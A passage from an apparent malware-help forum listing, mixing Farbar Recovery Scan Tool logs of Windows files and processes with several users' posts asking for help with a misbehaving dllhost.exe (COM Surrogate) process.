C:\WINDOWS\system32\WpAXHolder.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00426496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OneDriveSettingSyncProvider.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00423776 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifitask.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00418304 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.BlockedShutdown.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00412160 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanmsm.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00410624 _____ (Microsoft Corporation) C:\WINDOWS\system32\facecredentialprovider.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00409944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\FWPKCLNT.SYS 2016-09-15 05:01 - 2016-09-15 05:01 - 00409088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MosResource.dll 
2016-09-15 05:01 - 2016-09-15 05:01 - 00409088 _____ (Microsoft Corporation) C:\WINDOWS\system32\MosResource.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00409088 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00408600 _____ (Microsoft Corporation) C:\WINDOWS\system32\tsmf.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00405344 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00402272 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00396800 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00396168 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanapi.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00391168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CredProvDataModel.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00391168 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00389632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\schannel.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00389000 _____ (Microsoft Corporation) C:\WINDOWS\system32\wevtapi.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00387584 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00382272 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockAppHost.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00380928 _____ (Microsoft Corporation) C:\WINDOWS\system32\wincorlib.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00379744 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\Classpnp.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00374784 _____ (Microsoft Corporation) C:\WINDOWS\system32\resutils.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00366592 _____ (Microsoft Corporation) C:\WINDOWS\system32\NmaDirect.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00363520 _____ (Microsoft Corporation) 
02:57 - 00329720 _____ C:\WINDOWS\system32\FNTCACHE.DAT 2016-09-15 01:04 - 2016-09-15 01:04 - 00000200 _____ C:\WINDOWS\system32\{EC94D02F-D200-4428-9531-05AF7F9799CB}.bat 2016-09-15 01:04 - 2016-09-15 01:04 - 00000000 ____D C:\Program Files\Intel 2016-09-15 01:04 - 2016-09-15 01:04 - 00000000 _____ C:\WINDOWS\system32\GfxValDisplayLog.bin 2016-09-15 01:04 - 2016-05-27 15:50 - 00104584 _____ (Khronos Group) C:\WINDOWS\SysWOW64\OpenCL.DLL 2016-09-15 01:04 - 2016-05-27 15:50 - 00100488 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.DLL 2016-09-05 13:44 - 2016-09-05 16:46 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox 2016-08-31 06:58 - 2016-09-13 02:00 - 00000550 _____ C:\WINDOWS\Tasks\SUPERAntiSpyware Scheduled Task bdd463d5-961f-4895-aa8b-12fed1956349.job 2016-08-31 06:58 - 2016-09-05 16:46 - 00000550 _____ C:\WINDOWS\Tasks\SUPERAntiSpyware Scheduled Task 9c97e707-2f6a-49fa-9c39-bf57a7fce1cb.job ==================== One Month Modified files and folders ======== (If an entry is included in the fixlist, the file/folder will be moved.) 
2016-09-19 21:11 - 2015-12-10 02:56 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys 2016-09-19 18:31 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\rescache 2016-09-19 16:28 - 2016-04-11 17:10 - 00000000 ____D C:\zzmp4 2016-09-19 15:28 - 2016-01-19 15:40 - 00000000 ____D C:\Users\GImagineG\AppData\Local\WORDsearch 11 2016-09-19 15:26 - 2016-01-19 15:40 - 00000000 ____D C:\Program Files (x86)\WORDsearch 11 2016-09-19 15:25 - 2015-12-10 03:29 - 01174306 _____ C:\WINDOWS\system32\PerfStringBackup.INI 2016-09-19 15:22 - 2015-12-10 03:43 - 00000000 __SHD C:\Users\GImagineG\IntelGraphicsProfiles 2016-09-19 15:20 - 2016-07-16 02:04 - 00262144 _____ C:\WINDOWS\system32\config\BBI 2016-09-19 15:20 - 2016-01-19 15:40 - 00000000 ____D C:\Users\GImagineG\Documents\WORDsearch 2016-09-19 15:20 - 2016-01-19 15:40 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WORDsearch 11 2016-09-19 15:00 - 2016-05-16 21:27 - 00000000 ____D C:\Users\GImagineG\AppData\Local\Sling_cache 2016-09-19 14:35 - 2016-07-16 07:45 - 00000000 ____D C:\WINDOWS\INF 2016-09-19 14:35 - 2015-12-11 07:04 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Visual Studio 2008 2016-09-19 14:27 - 2016-07-16 07:36 - 00000000 ____D C:\WINDOWS\CbsTemp 2016-09-19 13:02 - 2016-07-16 07:47 - 00000000 ___RD C:\Program Files\Windows Defender 2016-09-19 13:02 - 2016-07-16 07:47 - 00000000 ___HD C:\Program Files\WindowsApps 2016-09-19 13:02 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\SysWOW64\MUI 2016-09-19 13:02 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\system32\MUI 2016-09-19 13:02 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\registration 2016-09-19 13:02 - 2016-07-16 02:04 - 00000000 ____D C:\WINDOWS\SysWOW64\downlevel 2016-09-19 13:02 - 2016-07-16 02:04 - 00000000 ____D C:\WINDOWS\SysWOW64\Dism 2016-09-19 13:02 - 2016-07-16 02:04 - 00000000 ____D C:\WINDOWS\system32\Sysprep 2016-09-19 13:02 - 2016-07-16 02:04 - 00000000 ____D 
C:\WINDOWS\system32\downlevel 2016-09-19 13:02 - 2016-07-16 02:04 - 00000000 ____D C:\WINDOWS\system32\Dism 2016-09-19 13:02 - 2016-07-16 02:04 - 00000000 ____D C:\WINDOWS\servicing 2016-09-19 13:02 - 2016-02-19 09:08 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Transcender 2016-09-19 13:02 - 2016-01-11 22:35 - 00000000 ____D C:\ProgramData\WORDsearch 2016-09-19 13:02 - 2015-12-15 12:19 - 00000000 ____D C:\Users\GImagineG\AppData\Roaming\vlc 2016-09-19 13:02 - 2015-12-10 07:41 - 00000000 ____D C:\Users\GImagineG\AppData\Roaming\Winamp 2016-09-19 13:01 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\appcompat 2016-09-19 13:01 - 2016-01-11 23:37 - 00000000 ____D C:\ProgramData\Real 2016-09-19 13:01 - 2015-12-11 06:25 - 00000000 ____D C:\Program Files\Reference Assemblies 2016-09-19 13:01 - 2015-12-11 06:25 - 00000000 ____D C:\Program Files (x86)\Reference Assemblies 2016-09-19 13:01 - 2015-12-11 06:25 - 00000000 ____D C:\Program Files (x86)\MSBuild 2016-09-16 05:04 - 2015-12-11 07:05 - 00000000 ____D C:\Users\GImagineG\Documents\SQL Server Management Studio 2016-09-15 05:03 - 2016-07-16 07:47 - 00028672 _____ C:\WINDOWS\system32\config\BCD-Template 2016-09-15 05:02 - 2016-07-16 07:47 - 00000000 ___SD C:\WINDOWS\system32\F12 2016-09-15 05:02 - 2016-07-16 07:47 - 00000000 ___SD C:\WINDOWS\system32\dsc 2016-09-15 05:02 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns 2016-09-15 05:02 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\system32\oobe 2016-09-15 05:02 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\system32\lv-LV 2016-09-15 05:02 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\system32\lt-LT 2016-09-15 05:02 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\system32\et-EE 2016-09-15 05:02 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\system32\es-MX 2016-09-15 05:02 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\system32\en-GB 2016-09-15 05:02 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\system32\appraiser 2016-09-15 
05:02 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\ShellExperiences 2016-09-15 05:02 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\Provisioning 2016-09-15 05:02 - 2016-07-16 07:47 - 00000000 ____D C:\Program Files (x86)\Windows Defender 2016-09-15 02:26 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\AppReadiness 2016-09-15 02:21 - 2015-12-10 03:31 - 00000000 ____D C:\Users\GImagineG\AppData\Local\Packages 2016-09-15 02:04 - 2015-12-10 03:32 - 00002375 _____ C:\Users\GImagineG\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk 2016-09-15 02:04 - 2015-12-10 03:32 - 00000000 ___RD C:\Users\GImagineG\OneDrive 2016-09-15 02:03 - 2015-12-10 03:31 - 00000000 __RHD C:\Users\Public\AccountPictures 2016-09-15 01:16 - 2016-07-16 07:47 - 00000000 ____D C:\ProgramData\USOPrivate 2016-09-15 01:15 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\system32\WinBioDatabase 2016-09-15 01:15 - 2016-07-16 02:04 - 00032768 _____ C:\WINDOWS\system32\config\ELAM 2016-09-15 01:15 - 2015-10-30 03:24 - 00000000 ____D C:\WINDOWS\system32\Tasks_Migrated 2016-09-15 01:14 - 2016-07-16 07:47 - 00000000 __RSD C:\WINDOWS\Media 2016-09-15 01:14 - 2016-07-16 07:47 - 00000000 __RHD C:\Users\Public\Libraries 2016-09-15 01:14 - 2015-12-10 01:47 - 00000938 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job 2016-09-15 01:13 - 2016-08-01 13:56 - 00000000 ____D C:\Users\GImagineG\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SUPERAntiSpyware 2016-09-15 01:13 - 2016-07-16 07:47 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft 2016-09-15 01:13 - 2016-04-21 04:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TinyWall 2016-09-15 01:13 - 2016-03-29 07:04 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight 2016-09-15 01:13 - 2016-02-21 11:23 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Tools 2016-09-15 01:13 - 2016-01-27 00:25 - 00000000 ____D 
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Notepad++ 2016-09-15 01:13 - 2016-01-11 23:40 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RealNetworks 2016-09-15 01:13 - 2015-12-29 19:36 - 00000000 ____D C:\Users\GImagineG\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\CCleaner 2016-09-15 01:13 - 2015-12-15 14:10 - 00000000 ____D C:\Users\GImagineG\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Yamb 2.1.0.0 beta 2 2016-09-15 01:13 - 2015-12-15 13:06 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip 2016-09-15 01:13 - 2015-12-15 12:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoLAN 2016-09-15 01:13 - 2015-12-14 16:35 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft SQL Server 2008R2 Community & Samples 2016-09-15 01:13 - 2015-12-12 04:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Visual Studio 2015 2016-09-15 01:13 - 2015-12-11 08:23 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Developer Network 2016-09-15 01:13 - 2015-12-11 06:58 - 00000000 ____D C:\WINDOWS\SysWOW64\1033 2016-09-15 01:13 - 2015-12-11 06:58 - 00000000 ____D C:\WINDOWS\system32\1033 2016-09-15 01:13 - 2015-12-11 06:48 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft SQL Server 2008 2016-09-15 01:13 - 2015-12-10 09:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Cool Edit Pro 2.0 2016-09-15 01:13 - 2015-12-10 09:11 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Nero 7 Essentials 2016-09-15 01:13 - 2015-12-10 09:11 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LightScribe Direct Disc Labeling 2016-09-15 01:13 - 2015-12-10 07:41 - 00000000 ____D C:\Users\GImagineG\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Winamp Detector Plug-in 2016-09-15 01:13 - 2015-12-10 07:41 - 00000000 ____D 
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Winamp 2016-09-15 01:13 - 2015-12-10 05:45 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime 2016-09-15 01:13 - 2015-12-10 02:56 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware 2016-09-15 01:13 - 2015-10-30 02:28 - 00000000 ____D C:\Users\Default.migrated 2016-09-15 01:08 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\SysWOW64\Macromed 2016-09-15 01:08 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\system32\spool 2016-09-15 01:08 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\system32\Macromed 2016-09-15 01:07 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\LiveKernelReports 2016-09-15 01:07 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\Help 2016-09-15 01:07 - 2016-07-16 07:47 - 00000000 ____D C:\Program Files\Common Files\microsoft shared 2016-09-15 01:07 - 2016-01-26 22:28 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SuperNZB 2016-09-15 01:07 - 2015-12-14 17:19 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft SQL Server 2008 R2 2016-09-15 01:07 - 2015-12-12 05:49 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Kits 2016-09-15 01:07 - 2015-12-12 04:55 - 00000000 ____D C:\Program Files\IIS 2016-09-15 01:07 - 2015-12-11 08:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Windows SDK v6.0A 2016-09-15 01:07 - 2015-12-11 08:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft SQL Server 2008 R2 November CTP 2016-09-15 01:07 - 2015-12-11 06:25 - 00000000 ____D C:\Program Files\MSBuild 2016-09-15 01:07 - 2015-10-30 05:07 - 00000000 ____D C:\WINDOWS\ShellNew 2016-09-15 01:05 - 2016-06-23 23:27 - 00000000 ____D C:\Users\GImagineG\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Sling 2016-09-15 01:05 - 2015-12-10 05:48 - 00000000 ____D 
C:\Users\GImagineG\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Amazon 2016-09-15 01:04 - 2016-07-16 07:47 - 00000000 ___RD C:\WINDOWS\PrintDialog 2016-09-15 01:04 - 2016-07-16 07:47 - 00000000 ___RD C:\WINDOWS\MiracastView 2016-09-15 01:04 - 2016-07-16 07:47 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel 2016-09-15 00:50 - 2016-07-16 11:17 - 00000000 ___HD C:\$WINDOWS.~BT 2016-09-15 00:12 - 2015-12-10 03:56 - 00000000 ____D C:\WINDOWS\system32\MRT 2016-09-15 00:10 - 2015-12-10 03:56 - 144199024 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe 2016-09-15 00:02 - 2015-12-10 01:47 - 00000942 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job 2016-09-14 23:51 - 2016-03-29 07:04 - 00000000 ____D C:\Program Files\Microsoft Silverlight 2016-09-14 23:51 - 2016-03-29 07:04 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight 2016-09-14 23:38 - 2015-10-30 03:19 - 00635904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqsnap.dll 2016-09-14 23:38 - 2015-10-30 03:19 - 00014848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqcertui.dll 2016-09-14 23:31 - 2015-12-12 05:05 - 00000000 ____D C:\Users\GImagineG\Documents\Visual Studio 2015 2016-09-14 23:26 - 2015-12-10 01:47 - 00002272 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk 2016-09-13 07:03 - 2015-12-11 07:02 - 00000000 ____D C:\Users\GImagineG\Documents\Visual Studio 2008 2016-09-07 12:32 - 2016-07-16 07:49 - 00828408 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe 2016-09-07 12:32 - 2016-07-16 07:49 - 00176632 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl 2016-09-05 16:46 - 2016-08-01 13:55 - 00000000 ____D C:\Program Files\SUPERAntiSpyware 2016-09-05 16:46 - 2016-03-29 06:50 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service ==================== Files in the root of some directories ======= 2016-03-29 01:23 - 2016-03-29 01:23 - 0000017 _____ () 
C:\Users\GImagineG\AppData\Local\resmon.resmoncfg ==================== Bamital & volsnap ================= (There is no automatic fix for files that do not pass verification.) C:\WINDOWS\system32\winlogon.exe => File is digitally signed C:\WINDOWS\system32\wininit.exe => File is digitally signed C:\WINDOWS\explorer.exe => File is digitally signed C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed C:\WINDOWS\system32\svchost.exe => File is digitally signed C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed C:\WINDOWS\system32\services.exe => File is digitally signed C:\WINDOWS\system32\User32.dll => File is digitally signed C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed C:\WINDOWS\system32\userinit.exe => File is digitally signed C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed C:\WINDOWS\system32\rpcss.dll => File is digitally signed C:\WINDOWS\system32\dnsapi.dll => File is digitally signed C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed LastRegBack: 2016-09-15 01:03 ==================== End of FRST.txt ============================
  5. Hi there. So, whenever I open Skype, I repeatedly get the whole shebang that is "dllhost.exe *32" COM Surrogate. It happens all of the time no matter how much I try and deal with it. I've used Malwarebytes Anti-Malware, restarted my computer multiple times after scanning my entire computer system, and scanned my computer with McAfee. No matter what I do, when I open Skype, the whole thing repeats itself. It's gotten to the point that I hardly want to open my Skype and bother doing anything about it. Skype is the only thing it affects is what I've noticed, by the way, and I'd truly love it if someone would help me out on how to fix this problem. Please and thank you for taking the time out of your day to help us computer noobs out.
  6. Greetings, Please, please help. Yesterday, I suddenly kept having to reclick the mouse to continue what I was doing: typing, scrolling, etc. I also noticed a brief wait icon next to the cursor at times. I opened Task Manager and noticed dllhost.exe is constantly stopping and restarting, stopping and restarting. Each time it does this, it resets the mouse state; it's also tying up system resources. I've scanned with Malwarebytes and it's finding no threats. I'm not experiencing multiple instances of dllhost.exe like so many others, just the one instance constantly restarting and resetting mouse state. I don't know what else it could be doing, but besides that concern, it's nearly impossible to efficiently or enjoyably conduct business and pleasure on the PC because I continually have to re-click whatever I'm in to make it the active window. Seems like malicious code, but I just can't seem to get it fixed. Thank you.
  7. I have been getting constant Malwarebytes Anti-Malware pop-ups for the last 12 hours about "Process: C:\WINDOWS\SysWOW64\dllhost.exe". I have tried to run a scan from Malwarebytes, but it is not identifying any problems.
  8. OK, here are the txt files after the scan. Thank you. Rick. FRST.txt Addition.txt
  9. Hello. Came on forum on October 28th with same issue. dllhost.exe running about 20 instances and eating up memory. Problem seemed fixed on October 28th through this forum, but it must have been buried deep because it is back. Noticed problems with my screen saver, Avira antivirus doing weird things and my wireless adapter flashing crazily. Checked Task Manager and sure enough, the dllhost.exe COM surrogate is replicating and bogging down my computer. I hope that's all it's doing..... Anyway, I ran the FARBAR utility and am attaching the FRST and ADDITION results to see if maybe someone can help get rid of this dang malware once and for all. In the meantime, I'm going to unhook from the internet until tomorrow to see if there's a reply from a moderator in case there's something nasty going on with this malware infection. Thanks, Todd. Addition.txt FRST.txt
  10. I am receiving malicious site blocked fff5ee.com. It lists the process as dllhost.exe. I see that you often start with running FRST.exe and having people submit the two attached files. Let me know the next steps. Addition.txt FRST.txt
  11. I used the Farbar Recovery scan tool to copy the logs into this dialog they are attached below, Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 26-10-2014 Ran by Office (administrator) on OFFICE-HP on 26-10-2014 16:57:05 Running from C:\Users\Office\Desktop Loaded Profile: Office (Available profiles: Office & LogMeInRemoteUser) Platform: Windows 7 Professional Service Pack 1 (X64) OS Language: English (United States) Internet Explorer Version 11 Boot Mode: Normal Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) (NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe (IDT, Inc.) C:\Program Files\IDT\WDM\stacsv64.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe (NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe (Broadcom Corporation) C:\Program Files\Broadcom\Broadcom 802.11\WLTRYSVC.EXE (Microsoft Corporation) C:\Windows\System32\wlanext.exe (Broadcom Corporation) C:\Program Files\Broadcom\Broadcom 802.11\BCMWLTRY.EXE (Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe (Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe (Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe (Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe (White Sky, Inc.) C:\Program Files (x86)\Constant Guard Protection Suite\IDVaultSvc.exe (LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LMIGuardianSvc.exe (LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\ramaint.exe (Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe (Google Inc.) C:\Program Files (x86)\Google\Update\1.3.25.5\GoogleCrashHandler.exe (Google Inc.) 
C:\Program Files (x86)\Google\Update\1.3.25.5\GoogleCrashHandler64.exe (Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe (Symantec Corporation) C:\Program Files (x86)\Norton Security Suite\Engine\21.6.0.32\n360.exe (Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe (Symantec Corporation) C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe (Palm) C:\Program Files\Palm, Inc\novacomd\amd64\novacomd.exe (PDF Complete Inc) C:\Program Files (x86)\PDF Complete\pdfsvc.exe (Intuit) C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe (Memeo) C:\Program Files (x86)\Seagate\Seagate Dashboard\SeagateDashboardService.exe (SPAMfighter ApS) C:\Program Files (x86)\Fighters\SPAMfighter\sfus.exe (SPAMfighter ApS) C:\Program Files (x86)\Fighters\FighterSuiteService.exe (TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe (Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE (Yahoo! Inc.) C:\Program Files (x86)\Yahoo!\SoftwareUpdate\YahooAUService.exe (Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE (LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LogMeIn.exe (Symantec Corporation) C:\Program Files (x86)\Norton Security Suite\Engine\21.6.0.32\n360.exe (White Sky, Inc.) C:\Program Files (x86)\Constant Guard Protection Suite\IDVault.exe (LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe (TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer.exe (Microsoft Corporation) C:\Windows\System32\rundll32.exe (TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version9\tv_w32.exe (TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version9\tv_x64.exe (IDT, Inc.) 
C:\Program Files\IDT\WDM\sttray64.exe (Hewlett-Packard ) C:\Program Files\IDT\WDM\Beats64.exe (Broadcom Corporation) C:\Program Files\Broadcom\Broadcom 802.11\WLTRAY.EXE (Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\HP Odometer\hpsysdrv.exe () C:\Windows\vsnpstd3.exe (Citrix Online, a division of Citrix Systems, Inc.) C:\Users\Office\AppData\Local\Citrix\GoToMeeting\1767\g2mstart.exe (Akamai Technologies, Inc.) C:\Users\Office\AppData\Local\Akamai\netsession_win.exe (Google Inc.) C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe (Akamai Technologies, Inc.) C:\Users\Office\AppData\Local\Akamai\netsession_win.exe (Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe (Citrix Online, a division of Citrix Systems, Inc.) C:\Users\Office\AppData\Local\Citrix\GoToMeeting\1767\g2mcomm.exe (Intuit Inc.) C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBUpdate\qbupdate.exe (Dropbox, Inc.) C:\Users\Office\AppData\Roaming\Dropbox\bin\Dropbox.exe (JustCloud.com) C:\Program Files (x86)\JustCloud\JustCloud.exe (Citrix Online, a division of Citrix Systems, Inc.) C:\Users\Office\AppData\Local\Citrix\GoToMeeting\1767\g2mlauncher.exe (Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe (Hewlett-Packard) C:\Program Files (x86)\Hp\HP Software Update\hpwuschd2.exe (Symantec Corporation) C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuClient.exe (Cisco Consumer Products LLC) C:\Program Files (x86)\Cisco Systems\Cisco Connect\CCPrt.exe (Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe (SPAMfighter ApS) C:\Program Files (x86)\Fighters\Tray\FightersTray.exe (SPAMfighter ApS) C:\Program Files (x86)\Fighters\SPAMfighter\sfagent.exe (Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\BTStackServer.exe (Apple Inc.) 
C:\Program Files (x86)\iTunes\iTunesHelper.exe (Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe (Memeo) C:\Program Files (x86)\Seagate\Seagate Dashboard\MemeoDashboard.exe (Google Inc.) C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbarUser_32.exe (Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe (SPAMfighter ApS) C:\Program Files (x86)\Fighters\SPAMfighter\x64\LiveKitLoader64.exe (Axentra Corporation) C:\Program Files (x86)\Seagate\Seagate Dashboard\HipServAgent\HipServAgent.exe (Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Elements 10 Organizer\PhotoshopElementsFileAgent.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Just Develop It) C:\Program Files (x86)\JustCloud\BackupStack.exe (Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\TouchSmart\Calendar\Service\GCalService.exe (Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\TouchSmart\Calendar\Service\HPTouchSmartSyncCalReminderApp.exe (Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe (Microsoft Corporation) C:\Program Files\Common 